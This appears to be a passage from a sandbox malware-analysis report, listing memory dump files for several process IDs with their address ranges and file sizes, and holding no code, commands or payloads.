memory/1264-37-0x0000000070E70000-0x0000000070EBC000-memory.dmpFilesize
304KB
-
memory/1264-47-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/1264-25-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/1264-26-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/1264-36-0x0000000007040000-0x0000000007074000-memory.dmpFilesize
208KB
-
memory/1264-48-0x0000000007080000-0x0000000007124000-memory.dmpFilesize
656KB
-
memory/1264-46-0x0000000007020000-0x000000000703E000-memory.dmpFilesize
120KB
-
memory/1876-91-0x00000224F1390000-0x00000224F13B2000-memory.dmpFilesize
136KB
-
memory/1876-95-0x00000224F1750000-0x00000224F177A000-memory.dmpFilesize
168KB
-
memory/1876-97-0x00007FFCD7BC0000-0x00007FFCD7C7D000-memory.dmpFilesize
756KB
-
memory/1876-96-0x00007FFCD91C0000-0x00007FFCD93C9000-memory.dmpFilesize
2.0MB
-
memory/3564-106-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3564-98-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3564-104-0x00007FFCD91C0000-0x00007FFCD93C9000-memory.dmpFilesize
2.0MB
-
memory/3564-105-0x00007FFCD7BC0000-0x00007FFCD7C7D000-memory.dmpFilesize
756KB
-
memory/3564-103-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3564-101-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3564-100-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3564-99-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3720-79-0x00000000081F0000-0x000000000822C000-memory.dmpFilesize
240KB
-
memory/3720-76-0x0000000007C10000-0x0000000007CA2000-memory.dmpFilesize
584KB
-
memory/3720-78-0x0000000007D10000-0x0000000007D22000-memory.dmpFilesize
72KB
-
memory/3720-75-0x0000000007AC0000-0x0000000007B2C000-memory.dmpFilesize
432KB
-
memory/3720-85-0x0000000008240000-0x000000000824A000-memory.dmpFilesize
40KB
-
memory/4496-18-0x0000000006080000-0x00000000060CC000-memory.dmpFilesize
304KB
-
memory/4496-6-0x00000000053D0000-0x0000000005436000-memory.dmpFilesize
408KB
-
memory/4496-22-0x00000000071F0000-0x0000000007252000-memory.dmpFilesize
392KB
-
memory/4496-21-0x0000000000E50000-0x0000000000E58000-memory.dmpFilesize
32KB
-
memory/4496-20-0x00000000065C0000-0x00000000065DA000-memory.dmpFilesize
104KB
-
memory/4496-19-0x0000000007820000-0x0000000007E9A000-memory.dmpFilesize
6.5MB
-
memory/4496-77-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/4496-17-0x0000000005FD0000-0x0000000005FEE000-memory.dmpFilesize
120KB
-
memory/4496-16-0x0000000005B10000-0x0000000005E67000-memory.dmpFilesize
3.3MB
-
memory/4496-23-0x0000000008EA0000-0x0000000009446000-memory.dmpFilesize
5.6MB
-
memory/4496-0-0x0000000074C8E000-0x0000000074C8F000-memory.dmpFilesize
4KB
-
memory/4496-7-0x0000000005440000-0x00000000054A6000-memory.dmpFilesize
408KB
-
memory/4496-5-0x0000000005230000-0x0000000005252000-memory.dmpFilesize
136KB
-
memory/4496-4-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/4496-3-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/4496-2-0x00000000054E0000-0x0000000005B0A000-memory.dmpFilesize
6.2MB
-
memory/4496-1-0x0000000002C50000-0x0000000002C86000-memory.dmpFilesize
216KB